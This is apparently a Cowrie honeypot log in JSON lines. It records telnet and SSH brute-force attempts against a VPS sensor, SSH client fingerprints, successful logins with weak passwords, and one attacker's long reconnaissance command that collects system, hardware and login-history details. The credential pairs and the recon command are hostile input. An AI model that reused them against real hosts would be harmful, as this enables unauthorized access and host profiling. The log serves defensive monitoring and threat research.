{"eventid":"cowrie.session.closed","duration":13.249589443206787,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:55:23.586105Z","src_ip":"212.227.125.160","session":"70fd40c07e55"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58325,"dst_ip":"1.2.3.4","dst_port":23,"session":"ee6113d1d821","protocol":"telnet","message":"New connection: 212.227.125.160:58325 (1.2.3.4:23) [session: ee6113d1d821]","sensor":"my-vps","timestamp":"2025-08-31T03:55:23.894125Z"}
{"eventid":"cowrie.session.closed","duration":12.73816204071045,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:55:24.543305Z","src_ip":"182.119.206.115","session":"0da540937a49"}
{"eventid":"cowrie.session.closed","duration":13.434545516967773,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:55:24.633051Z","src_ip":"212.227.125.160","session":"d369489dac35"}
{"eventid":"cowrie.session.connect","src_ip":"182.119.206.115","src_port":51785,"dst_ip":"1.2.3.4","dst_port":23,"session":"9c32c2110d9e","protocol":"telnet","message":"New connection: 182.119.206.115:51785 (1.2.3.4:23) [session: 9c32c2110d9e]","sensor":"my-vps","timestamp":"2025-08-31T03:55:24.719347Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58334,"dst_ip":"1.2.3.4","dst_port":23,"session":"694ed21fd8e6","protocol":"telnet","message":"New connection: 212.227.125.160:58334 (1.2.3.4:23) [session: 694ed21fd8e6]","sensor":"my-vps","timestamp":"2025-08-31T03:55:25.861650Z"}
{"eventid":"cowrie.session.closed","duration":13.160598516464233,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:55:26.369988Z","src_ip":"212.227.125.160","session":"bebda4cac887"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58338,"dst_ip":"1.2.3.4","dst_port":23,"session":"f8ddd321c211","protocol":"telnet","message":"New connection: 212.227.125.160:58338 (1.2.3.4:23) [session: f8ddd321c211]","sensor":"my-vps","timestamp":"2025-08-31T03:55:26.585658Z"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.112","src_port":18700,"dst_ip":"1.2.3.4","dst_port":22,"session":"a0fd9018db0b","protocol":"ssh","message":"New connection: 80.94.95.112:18700 (1.2.3.4:22) [session: a0fd9018db0b]","sensor":"my-vps","timestamp":"2025-08-31T03:55:35.612911Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T03:55:35.613832Z","src_ip":"80.94.95.112","session":"a0fd9018db0b"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T03:55:35.643894Z","src_ip":"80.94.95.112","session":"a0fd9018db0b"}
{"eventid":"cowrie.login.failed","username":"admin","password":"ZZ8807zpl","message":"login attempt [admin/ZZ8807zpl] failed","sensor":"my-vps","timestamp":"2025-08-31T03:55:35.847037Z","src_ip":"80.94.95.112","session":"a0fd9018db0b"}
{"eventid":"cowrie.session.closed","duration":"20.0","message":"Connection lost after 20.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:55:36.655366Z","src_ip":"212.227.125.160","session":"7e770e9b9b23"}
{"eventid":"cowrie.login.failed","username":"admin","password":"youandme","message":"login attempt [admin/youandme] failed","sensor":"my-vps","timestamp":"2025-08-31T03:55:36.878402Z","src_ip":"80.94.95.112","session":"a0fd9018db0b"}
{"eventid":"cowrie.session.closed","duration":12.881605386734009,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:55:37.600883Z","src_ip":"182.119.206.115","session":"9c32c2110d9e"}
{"eventid":"cowrie.session.connect","src_ip":"182.119.206.115","src_port":52097,"dst_ip":"1.2.3.4","dst_port":23,"session":"cdfd7bd60261","protocol":"telnet","message":"New connection: 182.119.206.115:52097 (1.2.3.4:23) [session: cdfd7bd60261]","sensor":"my-vps","timestamp":"2025-08-31T03:55:37.735247Z"}
{"eventid":"cowrie.session.closed","duration":13.872108936309814,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:55:37.766162Z","src_ip":"212.227.125.160","session":"ee6113d1d821"}
{"eventid":"cowrie.login.failed","username":"admin","password":"ynot","message":"login attempt [admin/ynot] failed","sensor":"my-vps","timestamp":"2025-08-31T03:55:37.910317Z","src_ip":"80.94.95.112","session":"a0fd9018db0b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58523,"dst_ip":"1.2.3.4","dst_port":23,"session":"041cf894b8b9","protocol":"telnet","message":"New connection: 212.227.125.160:58523 (1.2.3.4:23) [session: 041cf894b8b9]","sensor":"my-vps","timestamp":"2025-08-31T03:55:37.963350Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"yfnfitymrf","message":"login attempt [admin/yfnfitymrf] failed","sensor":"my-vps","timestamp":"2025-08-31T03:55:38.942851Z","src_ip":"80.94.95.112","session":"a0fd9018db0b"}
{"eventid":"cowrie.session.closed","duration":13.436296939849854,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:55:39.297852Z","src_ip":"212.227.125.160","session":"694ed21fd8e6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58531,"dst_ip":"1.2.3.4","dst_port":23,"session":"a0f8450fd8ec","protocol":"telnet","message":"New connection: 212.227.125.160:58531 (1.2.3.4:23) [session: a0f8450fd8ec]","sensor":"my-vps","timestamp":"2025-08-31T03:55:39.533633Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:55:39.935601Z","src_ip":"212.227.125.160","session":"5a335e5795bd"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T03:55:39.936304Z","src_ip":"212.227.125.160","session":"5a335e5795bd"}
{"eventid":"cowrie.login.failed","username":"admin","password":"woof","message":"login attempt [admin/woof] failed","sensor":"my-vps","timestamp":"2025-08-31T03:55:39.974528Z","src_ip":"80.94.95.112","session":"a0fd9018db0b"}
{"eventid":"cowrie.session.closed","duration":13.84034276008606,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:55:40.425936Z","src_ip":"212.227.125.160","session":"f8ddd321c211"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58536,"dst_ip":"1.2.3.4","dst_port":23,"session":"fa6fc9e82bf5","protocol":"telnet","message":"New connection: 212.227.125.160:58536 (1.2.3.4:23) [session: fa6fc9e82bf5]","sensor":"my-vps","timestamp":"2025-08-31T03:55:40.666331Z"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:55:41.006047Z","src_ip":"80.94.95.112","session":"a0fd9018db0b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38528,"dst_ip":"1.2.3.4","dst_port":22,"session":"5a0a40a23839","protocol":"ssh","message":"New connection: 212.227.235.229:38528 (1.2.3.4:22) [session: 5a0a40a23839]","sensor":"my-vps","timestamp":"2025-08-31T03:55:41.393785Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:55:42.180051Z","src_ip":"212.227.235.229","session":"5a0a40a23839"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:55:42.181441Z","src_ip":"212.227.235.229","session":"5a0a40a23839"}
{"eventid":"cowrie.login.failed","username":"master","password":"root123","message":"login attempt [master/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:55:48.193373Z","src_ip":"212.227.235.229","session":"5a0a40a23839"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:55:50.080817Z","src_ip":"212.227.235.229","session":"5a0a40a23839"}
{"eventid":"cowrie.session.closed","duration":12.792114496231079,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:55:50.527275Z","src_ip":"182.119.206.115","session":"cdfd7bd60261"}
{"eventid":"cowrie.session.connect","src_ip":"182.119.206.115","src_port":52410,"dst_ip":"1.2.3.4","dst_port":23,"session":"1f8ab05fb86f","protocol":"telnet","message":"New connection: 182.119.206.115:52410 (1.2.3.4:23) [session: 1f8ab05fb86f]","sensor":"my-vps","timestamp":"2025-08-31T03:55:50.698981Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"11.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 11.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:55:50.985588Z","src_ip":"212.227.125.160","session":"5a335e5795bd"}
{"eventid":"cowrie.session.closed","duration":"85.3","message":"Connection lost after 85.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:55:51.091564Z","src_ip":"212.227.125.160","session":"5a335e5795bd"}
{"eventid":"cowrie.session.closed","duration":13.617073059082031,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:55:51.580348Z","src_ip":"212.227.125.160","session":"041cf894b8b9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58578,"dst_ip":"1.2.3.4","dst_port":23,"session":"63dd1b34d8dc","protocol":"telnet","message":"New connection: 212.227.125.160:58578 (1.2.3.4:23) [session: 63dd1b34d8dc]","sensor":"my-vps","timestamp":"2025-08-31T03:55:51.809382Z"}
{"eventid":"cowrie.login.success","username":"root","password":"Qq123456","message":"login attempt [root/Qq123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:55:53.805127Z","src_ip":"212.227.235.229","session":"e5a7be02a859"}
{"eventid":"cowrie.session.closed","duration":14.305883407592773,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:55:53.839448Z","src_ip":"212.227.125.160","session":"a0f8450fd8ec"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58589,"dst_ip":"1.2.3.4","dst_port":23,"session":"d462f9a906f3","protocol":"telnet","message":"New connection: 212.227.125.160:58589 (1.2.3.4:23) [session: d462f9a906f3]","sensor":"my-vps","timestamp":"2025-08-31T03:55:54.128572Z"}
{"eventid":"cowrie.session.closed","duration":13.661081075668335,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:55:54.327340Z","src_ip":"212.227.125.160","session":"fa6fc9e82bf5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58594,"dst_ip":"1.2.3.4","dst_port":23,"session":"be38dd67f730","protocol":"telnet","message":"New connection: 212.227.125.160:58594 (1.2.3.4:23) [session: be38dd67f730]","sensor":"my-vps","timestamp":"2025-08-31T03:55:54.587308Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38288,"dst_ip":"1.2.3.4","dst_port":22,"session":"47c01d3c2277","protocol":"ssh","message":"New connection: 212.227.235.229:38288 (1.2.3.4:22) [session: 47c01d3c2277]","sensor":"my-vps","timestamp":"2025-08-31T03:55:56.464269Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57076,"dst_ip":"1.2.3.4","dst_port":22,"session":"99f9df3aa049","protocol":"ssh","message":"New connection: 212.227.125.160:57076 (1.2.3.4:22) [session: 99f9df3aa049]","sensor":"my-vps","timestamp":"2025-08-31T03:56:02.643470Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:56:03.235025Z","src_ip":"212.227.125.160","session":"99f9df3aa049"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:56:03.236027Z","src_ip":"212.227.125.160","session":"99f9df3aa049"}
{"eventid":"cowrie.session.closed","duration":12.832011461257935,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:56:03.530921Z","src_ip":"182.119.206.115","session":"1f8ab05fb86f"}
{"eventid":"cowrie.session.connect","src_ip":"182.119.206.115","src_port":52743,"dst_ip":"1.2.3.4","dst_port":23,"session":"27fa00181cd5","protocol":"telnet","message":"New connection: 182.119.206.115:52743 (1.2.3.4:23) [session: 27fa00181cd5]","sensor":"my-vps","timestamp":"2025-08-31T03:56:03.685528Z"}
{"eventid":"cowrie.login.failed","username":"master","password":"root123","message":"login attempt [master/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:56:05.418482Z","src_ip":"212.227.125.160","session":"99f9df3aa049"}
{"eventid":"cowrie.session.closed","duration":13.648132801055908,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:56:05.457448Z","src_ip":"212.227.125.160","session":"63dd1b34d8dc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58781,"dst_ip":"1.2.3.4","dst_port":23,"session":"d6768ab87749","protocol":"telnet","message":"New connection: 212.227.125.160:58781 (1.2.3.4:23) [session: d6768ab87749]","sensor":"my-vps","timestamp":"2025-08-31T03:56:05.736163Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35952,"dst_ip":"1.2.3.4","dst_port":22,"session":"00cf18a1ae27","protocol":"ssh","message":"New connection: 212.227.125.160:35952 (1.2.3.4:22) [session: 00cf18a1ae27]","sensor":"my-vps","timestamp":"2025-08-31T03:56:06.112124Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:56:06.112881Z","src_ip":"212.227.125.160","session":"00cf18a1ae27"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:56:06.275833Z","src_ip":"212.227.125.160","session":"00cf18a1ae27"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:56:06.766472Z","src_ip":"212.227.125.160","session":"00cf18a1ae27"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:56:07.008706Z","src_ip":"212.227.125.160","session":"99f9df3aa049"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:56:07.107856Z","src_ip":"212.227.125.160","session":"00cf18a1ae27"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-31T03:56:07.108568Z","src_ip":"212.227.125.160","session":"00cf18a1ae27"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T03:56:07.109294Z","src_ip":"212.227.125.160","session":"00cf18a1ae27"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T03:56:07.110235Z","src_ip":"212.227.125.160","session":"00cf18a1ae27"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-31T03:56:07.111728Z","src_ip":"212.227.125.160","session":"00cf18a1ae27"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T03:56:07.112684Z","src_ip":"212.227.125.160","session":"00cf18a1ae27"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T03:56:07.113316Z","src_ip":"212.227.125.160","session":"00cf18a1ae27"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-31T03:56:07.114069Z","src_ip":"212.227.125.160","session":"00cf18a1ae27"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-31T03:56:07.114437Z","src_ip":"212.227.125.160","session":"00cf18a1ae27"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T03:56:07.114897Z","src_ip":"212.227.125.160","session":"00cf18a1ae27"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T03:56:07.115423Z","src_ip":"212.227.125.160","session":"00cf18a1ae27"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T03:56:07.116364Z","src_ip":"212.227.125.160","session":"00cf18a1ae27"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T03:56:07.117052Z","src_ip":"212.227.125.160","session":"00cf18a1ae27"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-31T03:56:07.280935Z","src_ip":"212.227.125.160","session":"00cf18a1ae27"}
